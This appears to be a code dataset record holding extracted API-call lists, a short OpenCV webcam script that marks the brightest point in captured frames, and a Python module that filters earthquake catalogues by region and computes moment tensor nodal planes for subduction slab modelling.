] | [((851, 878), 'cluster.make_clusters', 'make_clusters', ([], {'k': '(4)', 'scale': '(1)'}), '(k=4, scale=1)\n', (864, 878), False, 'from cluster import KMeans, make_clusters\n'), ((907, 934), 'cluster.make_clusters', 'make_clusters', ([], {'k': '(8)', 'scale': '(2)'}), '(k=8, scale=2)\n', (920, 934), False, 'from cluster import KMeans, make_clusters\n'), ((963, 990), 'cluster.make_clusters', 'make_clusters', ([], {'k': '(3)', 'scale': '(2)'}), '(k=3, scale=2)\n', (976, 990), False, 'from cluster import KMeans, make_clusters\n'), ((1033, 1066), 'cluster.make_clusters', 'make_clusters', ([], {'n': '(1000)', 'm': '(200)', 'k': '(3)'}), '(n=1000, m=200, k=3)\n', (1046, 1066), False, 'from cluster import KMeans, make_clusters\n'), ((1079, 1090), 'cluster.KMeans', 'KMeans', ([], {'k': '(4)'}), '(k=4)\n', (1085, 1090), False, 'from cluster import KMeans, make_clusters\n'), ((1105, 1116), 'cluster.KMeans', 'KMeans', ([], {'k': '(8)'}), '(k=8)\n', (1111, 1116), False, 'from cluster import KMeans, make_clusters\n'), ((1131, 1142), 'cluster.KMeans', 'KMeans', ([], {'k': '(3)'}), '(k=3)\n', (1137, 1142), False, 'from cluster import KMeans, make_clusters\n'), ((1160, 1171), 'cluster.KMeans', 'KMeans', ([], {'k': '(3)'}), '(k=3)\n', (1166, 1171), False, 'from cluster import KMeans, make_clusters\n'), ((216, 241), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (229, 241), False, 'import pytest\n'), ((267, 278), 'cluster.KMeans', 'KMeans', ([], {'k': '(0)'}), '(k=0)\n', (273, 278), False, 'from cluster import KMeans, make_clusters\n'), ((2577, 2606), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (2590, 2606), False, 'import pytest\n'), ((2646, 2678), 'cluster.make_clusters', 'make_clusters', ([], {'n': '(3)', 'k': '(4)', 'scale': '(1)'}), '(n=3, k=4, scale=1)\n', (2659, 2678), False, 'from cluster import KMeans, make_clusters\n')] |
import cv2
import time
# Open Camera
camera = cv2.VideoCapture(0)
# Set definition
camera.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
camera.set(cv2.CAP_PROP_FRAME_HEIGHT, 1024)
time.sleep(2)
# camera.set(15, -8.0)
def get_image():
retval, im = camera.read()
return im
def get_warm_up_image():
# Warmup
for i in range(10):
temp = get_image()
# Save result
#file = "/notebooks/test-capture-hot-point/image%d.png" % (i)
#cv2.imwrite(file, temp)
return get_image()
# Image to update
base_image = get_warm_up_image()
for i in range(1,6):
time.sleep(3)
print("Capturing image... %d" % (i))
capture = get_warm_up_image()
# Convert and process
gray = cv2.cvtColor(capture, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (19,19),0)
# Find spot
(minVal, maxVal, minLoc, maxLoc) = cv2.minMaxLoc(gray)
# Materialize spot
cv2.circle(base_image,(maxLoc),10,(0,255,0),-1)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(base_image, "P%d" % (i), (maxLoc), font, 0.5, (255,0,0), 1, cv2.LINE_AA)
# Save result
file = "/notebooks/test-capture-hot-point/image.png"
cv2.imwrite(file, base_image)
# Cleanup
del(camera) | [
"cv2.imwrite",
"time.sleep",
"cv2.putText",
"cv2.minMaxLoc",
"cv2.circle",
"cv2.VideoCapture",
"cv2.cvtColor",
"cv2.GaussianBlur"
] | [((47, 66), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (63, 66), False, 'import cv2\n'), ((172, 185), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (182, 185), False, 'import time\n'), ((1073, 1102), 'cv2.imwrite', 'cv2.imwrite', (['file', 'base_image'], {}), '(file, base_image)\n', (1084, 1102), False, 'import cv2\n'), ((546, 559), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (556, 559), False, 'import time\n'), ((662, 703), 'cv2.cvtColor', 'cv2.cvtColor', (['capture', 'cv2.COLOR_BGR2GRAY'], {}), '(capture, cv2.COLOR_BGR2GRAY)\n', (674, 703), False, 'import cv2\n'), ((712, 747), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['gray', '(19, 19)', '(0)'], {}), '(gray, (19, 19), 0)\n', (728, 747), False, 'import cv2\n'), ((796, 815), 'cv2.minMaxLoc', 'cv2.minMaxLoc', (['gray'], {}), '(gray)\n', (809, 815), False, 'import cv2\n'), ((838, 889), 'cv2.circle', 'cv2.circle', (['base_image', 'maxLoc', '(10)', '(0, 255, 0)', '(-1)'], {}), '(base_image, maxLoc, 10, (0, 255, 0), -1)\n', (848, 889), False, 'import cv2\n'), ((920, 1007), 'cv2.putText', 'cv2.putText', (['base_image', "('P%d' % i)", 'maxLoc', 'font', '(0.5)', '(255, 0, 0)', '(1)', 'cv2.LINE_AA'], {}), "(base_image, 'P%d' % i, maxLoc, font, 0.5, (255, 0, 0), 1, cv2.\n LINE_AA)\n", (931, 1007), False, 'import cv2\n')] |
#!/usr/bin/env python
#import standard libraries
import obspy.imaging.beachball
import datetime
import os
import csv
import pandas as pd
import numpy as np
import fnmatch
from geopy.distance import geodesic
from math import *
#from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
from matplotlib import path
class NewFile:
'''Creates a file object with associated uncertainty and event type'''
def __init__(self, filename, unc, event_type, source):
self.filename = filename
self.event_type = event_type
self.unc = unc
self.name = source
def maketime(timestring):
'''Used in argument parser below. Makes a datetime object from a timestring.'''
TIMEFMT = '%Y-%m-%dT%H:%M:%S'
DATEFMT = '%Y-%m-%d'
TIMEFMT2 = '%m-%d-%YT%H:%M:%S.%f'
outtime = None
try:
outtime = datetime.strptime(timestring, TIMEFMT)
except:
try:
outtime = datetime.strptime(timestring, DATEFMT)
except:
try:
outtime = datetime.strptime(timestring, TIMEFMT2)
except:
print('Could not parse time or date from %s' % timestring)
print (outtime)
return outtime
def infile(s):
'''Stores filename, event type, and uncertainty where provided from comma separated string.'''
default_uncertainty = 15
try:
infile,unc,etype = s.split(',')
unc = float(unc)
return (infile, unc, etype)
except:
try:
s = s.split(',')
infile, unc, etype = s[0], default_uncertainty, s[1]
return (infile, unc, etype)
except:
raise argparse.ArgumentTypeError('Input file information must be \
given as infile,unc,etype or as infile,etype')
def datelinecross(x):
''' Arguments: x - longitude value (positive or negative)
Returns: x - a positive longitude. Stays the same if the input was positive,
is changed to positive if the input was negative '''
if x<0:
return x+360
else:
return x
###############################################
### 9 ###
###############################################
## Written GLM
def meridiancross(x):
''' Arguments: x - longitude value (positive or negative)
Returns: x - a longitude in the -180/180 domain '''
if x>180:
return x-360
else:
return x
def northcross(x):
''' Arguments: x - longitude value (positive or negative)
Returns: x - a longitude in the -180/180 domain '''
if x<90:
return x+360
else:
return x
def unnorthcross(x):
''' Arguments: x - longitude value (positive or negative)
Returns: x - a longitude in the -180/180 domain '''
if x>360:
return x-360
else:
return x
def zerothreesixty(data):
data['lon']=data.apply(lambda row: datelinecross(row['lon']),axis=1)
return data
def oneeighty(data):
data['lon']=data.apply(lambda row: meridiancross(row['lon']),axis=1)
return data
def northernaz(data):
data['az']=data.apply(lambda row: northcross(row['az']),axis=1)
return data
def notnorthanymore(data):
data['az']=data.apply(lambda row: unnorthcross(row['az']),axis=1)
return data
def writetofile(input_file, output_file, event_type, uncertainty, args, catalogs, file_no, seismo_thick, slabname, name):
''' Writes an input file object to the given output file.
Acquires the necessary columns from the file, calculates moment tensor information.
Eliminates rows of data that do not fall within the specified bounds
(date, magnitude, & location).
If the event type is an earthquake, the catalog is compared to all previously
entered catalogs. Duplicate events are removed from the subsequent entries
(prioritization is determined by the order in which catalogs are entered).
Writes filtered dataframe to output file and prints progress to console.
Arguments: input_file - input file from input or slab2database
output_file - file where new dataset will be written
event_type - two letter ID that indicates the type of data (AS, EQ, BA, etc)
uncertainty - the default uncertainty associated with this file or event type
args - arguments provided from command line (bounds, magnitude limits, etc)
catalogs - a list of EQ catalogs that are being written to this file
file_no - file number, used for making event IDs '''
in_file = open(input_file)
fcsv = (input_file[:-4]+'.csv')
# Reading .csv file into dataframe - all files must be in .csv format
try:
if input_file.endswith('.csv'):
data = pd.read_csv(input_file, low_memory=False)
else:
print ('Input file %s was not written to file. MUST BE IN .CSV FORMAT' % input_file)
pass
except:
print ('Could not read file %s. A header line of column labels \
followed by a deliminated dataset is expected. Check file format to ensure this \
is such. All files must be in .csv format.' % input_file)
if 'ID' in data.columns:
pass
elif 'id_no' in data.columns:
data['ID'] = data['id_no'].values
else:
start_ID = file_no*100000
stop_ID = start_ID + len(data)
ID = np.arange(start_ID, stop_ID, 1)
data['ID'] = ID
data = makeframe(data, fcsv, event_type, uncertainty, args, seismo_thick,slabname)
data = inbounds(args, data, slabname)
#If option is chosen at command line, removes duplicate entries for the same event
#alternate preference for global or regional catalogues depending upon input arguments
try:
regional_pref
except NameError:
pass
else:
try:
tup = (data, fcsv)
if len(catalogs) > 0:
for idx, row in enumerate(catalogs):
if fnmatch.fnmatch(row, '*global*'):
position = idx
name_of_file = row
if regional_pref == 0 and position != 0:
first_file = catalogs[0]
catalogs[position] = first_file
catalogs[0] = name_of_file
elif regional_pref == 1 and position != (len(catalogs)-1):
last_file = catalogs[(len(catalogs)-1)]
catalogs[position] = first_file
catalogs[(len(catalogs)-1)] = name_of_file
else:
pass
for cat in catalogs:
data = rid_matches(cat[0], data, cat[1], fcsv)
elif len(catalogs) == 0:
catalogs.append(tup)
except:
print ('If file contains earthquake information (event-type = EQ), \
required columns include: lat,lon,depth,mag,time. The columns of the current \
file: %s. Check file format to ensure these columns are present and properly \
labeled.' % data.columns)
#MF 8.9.16 add source to output file
try:
listints = data['ID'].values.astype(int)
except:
start_ID = file_no*100000
stop_ID = start_ID + len(data)
ID = np.arange(start_ID, stop_ID, 1)
data['id_no'] = data['ID'].values
data['ID'] = ID
data['src'] = name
write_data(data, output_file)
print ('The file: %s was written to %s' % (input_file, output_file))
print ('---------------------------------------------------------------------------------')
def castfloats(data):
'''Casts all numerical and nan values to floats to avoid error in calculations'''
data[['lat']] = data[['lat']].astype(float)
data[['lon']] = data[['lon']].astype(float)
data[['depth']] = data[['depth']].astype(float)
data[['unc']] = data[['unc']].astype(float)
if 'mag' in data.columns:
data[['mag']] = data[['mag']].astype(float)
if 'mrr' in data.columns:
data[['mrr']] = data[['mrr']].astype(float)
data[['mtt']] = data[['mtt']].astype(float)
data[['mpp']] = data[['mpp']].astype(float)
data[['mrt']] = data[['mrt']].astype(float)
data[['mrp']] = data[['mrp']].astype(float)
data[['mtp']] = data[['mtp']].astype(float)
if 'Paz' in data.columns and 'Ppl' in data.columns:
data[['Paz']] = data[['Paz']].astype(float)
data[['Ppl']] = data[['Ppl']].astype(float)
data[['Taz']] = data[['Taz']].astype(float)
data[['Tpl']] = data[['Tpl']].astype(float)
data[['S1']] = data[['S1']].astype(float)
data[['D1']] = data[['D1']].astype(float)
data[['R1']] = data[['R1']].astype(float)
data[['S2']] = data[['S2']].astype(float)
data[['D2']] = data[['D2']].astype(float)
data[['R2']] = data[['R2']].astype(float)
return data
def rid_nans(df):
'''Removes points where lat,lon,depth, or uncertainty values are not provided.'''
df = df[np.isfinite(df['lat'])]
df = df[np.isfinite(df['lon'])]
df = df[np.isfinite(df['depth'])]
df = df[np.isfinite(df['unc'])]
return df
def write_data(df, output_file):
''' Arguments: df - filtered dataframe to be written to file
output_file - output file where data is to be written '''
# If file name does not exist, creates file and writes filtered dataframe to it
df = castfloats(df)
df = rid_nans(df)
if not os.path.isfile(output_file):
with open(output_file, 'w') as f:
df.to_csv(f, header=True, index=False, float_format='%0.3f', na_rep = float('nan'))
# If the output file already exists, new filtered data points are appended to
# existing information
else:
old = pd.read_csv(output_file)
all = pd.concat([old,df],sort=True)
all = castfloats(all)
all = rid_nans(all)
if len(df.columns) > len(old.columns):
all = all[df.columns]
else:
all = all[old.columns]
# Writes desired columns of a filtered dataframe to the output file
with open(output_file, 'w') as f:
all.to_csv(f, header=True, index=False, float_format='%0.3f', na_rep = float('nan'))
def inbounds(args, data, slab):
''' Originally written by Ginvera, modified by MAF July 2016 '''
''' Arguments: args - input arguments provided from command line arguments
data - dataframe to be filtered based on bounds
Returns: data - filtered dataframe based on bounds '''
# Eliminates data points that are not within specified bounds where provided
if 'time' in data.columns:
try:
data['time'] = pd.to_datetime(data['time'])
except:
try:
data['time'] = pd.to_datetime(data['time'],format='%m-%d-%YT%H:%M:%S')
except:
try:
data['time'] = pd.to_datetime(data['time'],format='%m-%d-%YT%H:%M:%S.%f')
except:
data = data[data.time != '9-14-2012T29:54:59.53']
data = data.reset_index(drop=True)
for index,row in data.iterrows():
print (row['time'])
try:
row['time'] = pd.to_datetime(row['time'],format='%m-%d-%YT%H:%M:%S')
except:
try:
row['time'] = pd.to_datetime(row['time'],format='%m-%d-%YT%H:%M:%S.%f')
except:
print ('this row could not be added, invalid time')
print ('lon,lat,depth,mag,time')
print (row['lon'],row['lat'],row['depth'],row['mag'],row['time'])
data.drop(index, inplace=True)
stime = datetime.datetime(1900,1,1)
etime = datetime.datetime.utcnow()
if args.startTime and args.endTime and args.startTime >= args.endTime:
print ('End time must be greater than start time. Your inputs: Start %s \
End %s' % (args.startTime, args.endTime))
sys.exit(1)
if args.bounds is not None:
lonmin = args.bounds[0]
lonmax = args.bounds[1]
latmin = args.bounds[2]
latmax = args.bounds[3]
minwest = lonmin > 0 and lonmin < 180
maxeast = lonmax < 0 and lonmax > -180
if minwest and maxeast:
data = data[(data.lon >= lonmin) | (data.lon <= lonmax)]
else:
data = data[(data.lon >= lonmin) & (data.lon <= lonmax)]
data = data[(data.lat >= latmin) & (data.lat <= latmax)]
else:
#first filter data within the slab outline (just gets locations though - doesn't filter by rest of info!)
#also, original data was a dataframe
data = getDataInRect(slab,data)
if len(data) > 0:
data_lon = data['lon']
data_lat = data['lat']
data_coords = list(zip(data_lon,data_lat))
indexes_of_bad_data = getDataInPolygon(slab,data_coords)
data_to_keep = data.drop(data.index[indexes_of_bad_data])
data = data_to_keep
else:
return data
if args.startTime is not None and 'time' in data.columns:
stime = args.startTime
data = data[data.time >= stime]
if args.endTime is not None and 'time' in data.columns:
etime = args.endTime
data = data[data.time <= etime]
if args.magRange is not None and 'mag' in data.columns:
magmin = args.magRange[0]
magmax = args.magRange[1]
data = data[(data.mag >= magmin) & (data.mag <= magmax)]
return data
def slabpolygon(slabname):
#####################################
#written by <NAME>, 7/19/2016#
#####################################
'''
inputting the slabname (3 character code) will return the polygon boundaries
'''
#load file with slab polygon boundaries
slabfile = 'library/misc/slab_polygons.txt'
filerows = []
with open(slabfile) as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
filerows.append(row)
csvfile.close()
#iterate through list to match the slabname and retrieve coordinates
slabbounds = []
for i in range(len(filerows)):
if slabname == filerows[i][0]:
slabbounds = filerows[i][1:]
slabbounds.append(slabbounds)
return slabbounds
def determine_polygon_extrema(slabname):
#####################################
#written by <NAME>, 7/18/2016#
#####################################
'''
inputs: slabname to be referenced against stored slab coordinates
outputs: the maximum and minimum latitude and longitude values for the input slab
'''
#calls slabpolygon function to get bounds for this slab region
slabbounds = slabpolygon(slabname)
#slabbbounds come in lon1,lat1,lon2,lat2... format
#even numbers are then longitudes while odds are latitudes
coords = np.size(slabbounds)
#simple even/odd function
def is_odd(num):
return num & 0x1
lons = []
lats = []
for i in range(coords):
val = slabbounds[i]
if is_odd(i):
lats.append(val)
else:
lons.append(val)
x1 = int(min(lons))
x2 = int(max(lons))
y1 = int(min(lats))
y2 = int(max(lats))
return x1,x2,y1,y2
def create_grid_nodes(grd_space,slabname):
#####################################
#written by <NAME>, 7/18/2016#
#####################################
'''
inputs: grid spacing between nodes of regular grid (must be an integer), slab code
outputs: coordinates of each node (corner/intersection) within the regular grid (numpy array)
'''
xmin,xmax,ymin,ymax = determine_polygon_extrema(slabname)
total_degrees_lon = xmax-xmin
total_degrees_lat = ymax-ymin
#max_iter represents max number of iterations in the y direction (longitude direction)
max_iter = total_degrees_lon/grd_space
#define a grid to divide the area
#accounts for a non-even division
q1, r1 = divmod(total_degrees_lat, grd_space)
q2, r2 = divmod(total_degrees_lon, grd_space)
if r1 > 0:
grid_y = total_degrees_lat/grd_space
else:
grid_y = total_degrees_lat/grd_space + 1
if r2 > 0:
grid_x = total_degrees_lon/grd_space
else:
grid_x = total_degrees_lon/grd_space + 1
#the total number of grids
boxes = grid_y*grid_x
#initialize array to save time
boundaries = np.zeros([boxes,4])
'''
count keeps track of iterations of longitude
holds latmin/latmax steady while lonmin/lonmax changes across
when max iterations in longitude have completed (gone across area)
the latmin/latmix will adjust and lonmin/lonmax will also be reset.
This process will continue until the number of boxes has been reached.
'''
count = 0
for i in range(boxes):
if count == max_iter-1:
lonmax = xmax + grd_space*count
lonmin = xmin + grd_space*count
count = 0
latmax = ymax
latmin = ymin
boundaries[i,0] = lonmin
boundaries[i,1] = lonmax
boundaries[i,2] = latmin
boundaries[i,3] = latmax
ymax = ymax - grd_space
ymin = ymin - grd_space
else:
lonmax = xmax + grd_space*count
lonmin = xmin + grd_space*count
count = count+1
latmax = ymax
latmin = ymin
boundaries[i,0] = lonmin
boundaries[i,1] = lonmax
boundaries[i,2] = latmin
boundaries[i,3] = latmax
return boundaries
def getDataInPolygon(slabname,data):
#####################################
#written by <NAME>, 7/20/2016#
#####################################
''' creates a grid of 1 or nan based on if they are within a clipping mask or not. DEP.6.29.16 '''
''' modified to fit this script by MAF 7/18/16 '''
### Input:
# slabname: a 3 digit character code identifying a slab region
#data: the input data which may or may not be within the polygon
### Output:
#contained_data: an array of coordinate pairs (lon,lat) that reside within the polygon region
#check if slabbounds are already defined. If not, acquire them
slabbounds = slabpolygon(slabname)
#slabbbounds come in lon1,lat1,lon2,lat2... format
#even numbers are then longitudes while odds are latitudes
coords = np.size(slabbounds)
#simple even/odd function
def is_odd(num):
return num & 0x1
lons = []
lats = []
for i in range(coords):
val = slabbounds[i][1:]
if is_odd(i):
lats.append(val)
else:
lons.append(val)
#create tuple of locations (with zip) to use in contains_points
xy = list(zip(lons,lats))
poly = path.Path(xy)
temp = poly.contains_points(data[:])
mask = np.zeros(len(temp),)*np.nan
mask[temp] = 1
keepers = []
for i in range(len(data)):
points_in_poly = np.dot(mask[i],data[i])
if i > 0:
keepers = np.vstack((keepers,points_in_poly))
else:
keepers = points_in_poly
rows_to_drop = []
for i in range(len(keepers)):
if np.isnan(keepers[i][0]) == True:
rows_to_drop.append(i)
return rows_to_drop
def getDataInRect(slabname,data1):
#####################################
#written by <NAME>, 7/20/2016#
#####################################
''' creates a grid of 1 or nan based on if they are within a clipping mask or not. DEP.6.29.16 '''
''' modified to fit this script by MAF 7/18/16 '''
### Input:
# slabname: a 3 digit character code identifying a slab region
#data: the input data which may or may not be within the polygon
### Output:
#contained_data: an array of coordinate pairs (lon,lat) that reside within the polygon region
#check if slabbounds are already defined. If not, acquire them
slabbounds = slabpolygon(slabname)
#slabbbounds come in lon1,lat1,lon2,lat2... format
#even numbers are then longitudes while odds are latitudes
coords = np.size(slabbounds)
#simple even/odd function
def is_odd(num):
return num & 0x1
lons = []
lats = []
for i in range(coords):
val = slabbounds[i][1:]
try:
val = float(val)
except:
break
if is_odd(i):
lats.append(val)
else:
lons.append(val)
lonmin = min(lons)
lonmax = max(lons)
latmin = min(lats)
latmax = max(lats)
if lonmin < 0 and lonmax < 0:
data1 = oneeighty(data1)
else:
data1 = zerothreesixty(data1)
data1 = data1[(data1.lon > lonmin) & (data1.lon < lonmax) &(data1.lat > latmin) &(data1.lat < latmax)]
return data1
def cmtfilter(data,seismo_thick):
''' Arguments: data - data with all shallow/nonshallow and thrust/nonthrust earthquake
Returns: filtered - fitered dataframe which DEPENDS ON WHAT YOU DO/DONT COMMENT OUT
(1) filters only shallow earthquakes that have MT criteria which are non thrust
all other shallow earthquakes WITHOUT MT info are NOT filtered
OR
(2) filters ALL shallow earthquakes UNLESS they have MT info and that
MT info has the criteria of a thrust event. '''
# Removes non-thrust events from depths shallower than seismogenic zone
deep_data = data[data.depth >= seismo_thick]
# Includes shallow data without MT info (1) - comment out next two lines for (2)
dfn = data[np.isnan(data['Paz'])]
dfn = dfn[data.depth < seismo_thick]
data = data[np.isfinite(data['Paz'])]
shallow_data = data[data.depth < seismo_thick]
# Depending on which MT info are provided, filters non-thrust, shallow events
if 'Ndip' in shallow_data.columns:
thrust_rake = (shallow_data.Tpl>50) & (shallow_data.Ndip<=30)
else:
thrust_rake = ((shallow_data.R1>30) & (shallow_data.R2>30)
& (shallow_data.R1<150) & (shallow_data.R2<150))
shallow_data = shallow_data[thrust_rake]
# Includes shallow data without MT info (1) - comment out next line for (2)
filtered = pd.concat([deep_data, shallow_data, dfn],sort=True)
# Only includes shallow thrust events (2) - uncomment line below for (2) and comment necessary lines above
# filtered = pd.concat([deep_data, shallow_data],sort=True)
# Rearranges columns / filters out unecessary columns
filtered=filtered[['lat','lon','depth','unc','ID','etype','mag','time',
'Paz','Ppl','Taz','Tpl','S1','D1','R1','S2','D2','R2','mlon','mlat','mdep']]
return filtered
def make_moment_tensor(mrr,mtt,mpp,mrt,mrp,mtp): #r,t,p = x,y,z
'''Used in m_to_planes below. Makes a moment tensor object from moment tensor components'''
return obspy.imaging.beachball.MomentTensor(mrr,mtt,mpp,mrt,mrp,mtp,1)
def m_to_planes(mrr,mtt,mpp,mrt,mrp,mtp,n):
'''Takes a moment tensor and calculates the P, N, and T axes and nodal plane information.
Used in moment_calc below. Returns one of these values as specified by input (n).
The integer input specifies which index of the array of outputs to return. '''
mt = make_moment_tensor(mrr,mtt,mpp,mrt,mrp,mtp)
#axes = obspy.imaging.beachball.MT2Axes(mt) #returns T, N, P
#fplane = obspy.imaging.beachball.MT2Plane(mt)#returns strike, dip, rake
#aplane = obspy.imaging.beachball.AuxPlane(fplane.strike, fplane.dip, fplane.rake)
#MAF changed because functions use lowercase, and aux_plane name includes underscore
axes = obspy.imaging.beachball.mt2axes(mt) #returns T, N, P
fplane = obspy.imaging.beachball.mt2plane(mt)#returns strike, dip, rake
aplane = obspy.imaging.beachball.aux_plane(fplane.strike, fplane.dip, fplane.rake)
Tstrike = axes[0].strike
Tdip = axes[0].dip
Pstrike = axes[2].strike
Pdip = axes[2].dip
S1 = fplane.strike
D1 = fplane.dip
R1 = fplane.rake
S2 = aplane[0]
D2 = aplane[1]
R2 = aplane[2]
mplanes = [Pstrike,Pdip,Tstrike,Tdip,S1,D1,R1,S2,D2,R2]
return mplanes[n]
def moment_calc(df, args, seismo_thick,slabname):
''' Creates and appends columns with Principal Axis and Nodal Plane information.
Used in makeframe below. Takes moment tensor information from input dataframe
columns and creates 11 new columns with information used to distinguish between thrust
and non-thrust earthquakes.
Arguments: df - dataframe with mt information in the form mrr,mtt,mpp,mrt,mrp,mtp
args - input arguments provided from command line arguments
Returns: df - dataframe with mt information in the form Paz,Ppl,Taz,Tpl,S1,D1,R1,S2,D2,R2
'''
#try:
# Only calculates MT info where it exists in EQ datasets
df = inbounds(args, df, slabname)
dfm = df[np.isfinite(df['mrr'])]
dfn = df[df['mrr'].isnull()]
#except:
# raise Exception,'If file contains earthquake information (event-type = EQ), \
# required columns include: lat,lon,depth,mag,time. The columns of the current \
# file: %s. Check file format to ensure these columns are present and properly \
# labeled.' % df.columns
# Calculates each new column of MT info
try:
dfm['Paz']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],0),axis=1)
dfm['Ppl']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],1),axis=1)
dfm['Taz']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],2),axis=1)
dfm['Tpl']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],3),axis=1)
dfm['S1']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],4),axis=1)
dfm['D1']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],5),axis=1)
dfm['R1']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],6),axis=1)
dfm['S2']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],7),axis=1)
dfm['D2']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],8),axis=1)
dfm['R2']=dfm.apply(lambda row: m_to_planes(row['mrr'], row['mtt'], row['mpp'],
row['mrt'], row['mrp'], row['mtp'],9),axis=1)
# Concatenates events with and without MT info
#dfm = cmtfilter(dfm,seismo_thick)
df = pd.concat([dfm,dfn],sort=True)
# Rearranges columns and returns
if 'mlon' in df.columns:
df = df[['lat','lon','depth','unc','ID','etype','mag','time',
'Paz','Ppl','Taz','Tpl','S1','D1','R1','S2','D2','R2','mlon','mlat','mdep']]
else:
df = df[['lat','lon','depth','unc','ID','etype','mag','time',
'Paz','Ppl','Taz','Tpl','S1','D1','R1','S2','D2','R2']]
df['mlon'] = df['lon'].values*1.0
df['mlat'] = df['lat'].values*1.0
df['mdep'] = df['depth'].values*1.0
return df
except:
# if exception is caught, try to return only events without MT info
try:
if len(dfm) == 0:
return dfn
except:
print('Where moment tensor information is available, columns \
must be labeled: mrr,mpp,mtt,mrp,mrt,mtp')
def ymdhmsparse(input_file):
'''Parses Yr Mo Day Hr Min Sec into one datetime object when provided in distinguished columns.
Used in makeframe below. Returns a new dataframe with parsed datetimes. '''
ymdhms = {'time':['year','month','day','hour','min','sec']}
dparse = lambda x: pd.datetime.strptime(x, '%Y %m %d %H %M %S')
cols = ['year','month','day','hour','min','sec','lat','lon','depth','mag']
data = pd.read_csv(input_file, parse_dates=ymdhms, usecols=cols, date_parser=dparse)
return data
def raiseUnc(x):
''' Raises unreasonably low uncertainties for earthquakes to a value greater
than that of average active source data points (which is 5 km). '''
if x < 6:
return 6
else:
return x
def makeframe(data, fcsv, event_type, uncertainty, args, seismo_thick,slabname):
''' Arguments: data - semi-filtered data frame to be filtered more and written to file
fcsv - filename of output file
event_type - kind of data i.e. BA, EQ, ER, TO etc
uncertainty - unc value provided in command line or set by default for etype
args - input arguments provided from command line arguments
Returns: data - fully filtered dataset to be written to output file '''
# Parses Yr Mo Day Hr Min Sec into one datetime object when provided in distinguished columns
if 'year' in data.columns and 'sec' in data.columns and 'mag' in data.columns:
data = ymdhmsparse(fcsv)
# If ISC-GEM data is provided, high quality, low uncertainties are included in place of
# the default values assigned in s2d.py main method.
if 'unc' in data.columns and 'q' in data.columns:
try:
data = data[(data.uq != 'C') & (data.unc < uncertainty)]
except:
print ('When adding a file with uncertainty quality, the column \
representing that quality must be labeled as uq')
# uses OG uncertainties where provided. Raises them if they are unreasonably low
elif 'unc' in data.columns:
uncert = data['unc'].values
try:
if isnan(uncert[1]):
data['unc'] = uncertainty
elif event_type == 'EQ':
data['unc'] = data.apply(lambda row: raiseUnc(row['unc']),axis=1)
else:
pass
except:
data['unc'] = uncertainty
# If no uncertainty column is included, the one provided in command line arguments is
# used to add a new column to the data, alternatively, the default value assigned in s2d.py is used
else:
data['unc'] = uncertainty
pd.options.mode.chained_assignment = None
# A new column marking the event type is added to the data. Everything is cast as a float
data['etype'] = event_type
data = castfloats(data)
# Calculates moment tensor info where applicable and removes shallow, non-thrust events
if 'mrr' in data.columns:
data = moment_calc(data, args, seismo_thick,slabname)
elif 'time' in data.columns and 'mag' in data.columns:
data = data[['lat','lon','depth','unc','ID','etype','mag','time']]
else:
pass
return data
##########################################################################################################
#The following serves to create a rough plot of the data types compiled with s2d.py.
##########################################################################################################
def plot_map(lons, lats, c, legend_label, projection='mill',
llcrnrlat=-80, urcrnrlat=90, llcrnrlon=-180, urcrnrlon=180, resolution='i'):
''' Optional Arguments: projection - map projection, default set as 'mill'
llcrnrlat - lower left corner latitude value, default is -80
urcrnrlat - upper right corner latitude value, default is 90
llcrnrlon - lower left corner longitude value, default is -180
urcrnrlon - upper right corner longitude value, default is 180
resolution - the resolution of the plot, default is 'i'
Required Arguments: lons - list of longitude values to be plotted
lats - list of latitude values to be plotted
c - the color of the points to be plotted
legend_label - how this set of points will be labeled on the legend
Returns: m - a basemap object defined by input bounds with input points included '''
# Creates a basic plot of a series of lat,lon points over a defined region
m = Basemap(projection=projection, llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,
llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon, resolution=resolution)
m.drawcoastlines()
m.drawmapboundary()
m.drawcountries()
m.etopo()
m.drawmeridians(np.arange(llcrnrlon, urcrnrlon, 5), labels=[0,0,0,1], fontsize=10)
m.drawparallels(np.arange(llcrnrlat, urcrnrlat, 5), labels=[1,0,0,0], fontsize=10)
x,y = m(lons, lats)
m.scatter(x, y, color=c, label=legend_label, marker='o', edgecolor='none', s=10)
return m
def datelinecross(x):
'''Converts negative longitudes to their positive equivalent for the sake of plotting.'''
if x<0:
return x+360
else:
return x
##############################################################################################
#Everything below this point serves the purpose of identifying and
#eliminating duplicate events between multiple earthquake catalog entries.
##############################################################################################
class Earthquake:
'''Creates an earthquake object from which event information can be extracted'''
def __init__(self,time,coords,depth,lat,lon,mag,catalog):
self.time = time
self.coords = coords
self.depth = depth
self.lat = lat
self.lon = lon
self.mag = mag
self.catalog = catalog
